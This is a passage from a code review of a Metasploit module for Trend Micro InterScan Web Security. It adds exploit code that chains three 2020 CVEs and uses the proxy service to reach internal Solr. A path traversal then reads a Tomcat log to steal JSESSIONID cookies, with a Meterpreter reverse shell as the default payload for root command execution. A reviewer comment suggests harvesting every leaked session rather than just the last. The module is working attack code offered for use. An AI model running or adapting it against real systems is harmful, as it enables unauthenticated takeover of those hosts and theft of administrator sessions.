modules/exploits/linux/http/trendmicro_websecurity_exec.rb

```diff
@@ -0,0 +1,167 @@
+
+        Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users
+        can exploit this vulnerability in order to communicate with internal services in the product.
+
+        Last but not least flaw exists within the Apache Solr application, which is installed within the product.
+        When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.
+        An attacker can leverage this vulnerability to disclose information in the context of IWSS user.
+
+        Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2020-8604'],
+          ['CVE', '2020-8605'],
+          ['CVE', '2020-8606'],
+          ['ZDI', '20-676'],
+          ['ZDI', '20-677'],
+          ['ZDI', '20-678']
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'payload' => 'python/meterpreter/reverse_tcp',
+          'WfsDelay'     => 30
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [ ['Automatic', {}] ],
+      'DisclosureDate' => '2020-06-10',
+      'DefaultTarget'  => 0
+       ))
+
+    register_options(
+      [
+        Opt::RPORT(8443),
+        OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])
+      ]
+    )
+  end
+
+  def target_unreachable(res)
+    unless res
+      fail_with(Failure::Unreachable, 'Target is unreachable.')
+    end
+  end
+
+  def leak_logfile
+    # Updating SSL and RPORT in order to communicate with HTTP proxy service.
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+    port_restore = datastore['RPORT']
+    datastore['RPORT'] = datastore['PROXY_PORT']
+
+    vprint_status('Trying to extract session ID by exploiting reverse proxy service')
+
+    @res = send_request_cgi({
+    'method' => 'GET',
+    'uri'    => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
+    'vars_get' => {
+      'command' => 'filecontent',
+      'wt'      => 'filestream',
+      'generation' => 1,
+      'file'    => "../"*7 << "var/iwss/tomcat/logs/catalina.out",
+      }
+    })
+    target_unreachable(@res)
+    vprint_good('Successfully exploited reverse proxy service !')
+    # Restore variables and validate extracted sessionid
+    datastore['SSL'] = true if ssl_restore
+    datastore['RPORT'] = port_restore
+    @res
+  end
+
+  def extract_cookie
+
+    @jsessionid = @res.body.scan(/JSESSIONID=(.*)/).flatten.last || ''
```

Comment:
why only take the last and not all?
I would say loop through the list, most recent first, so you dont miss any sessions.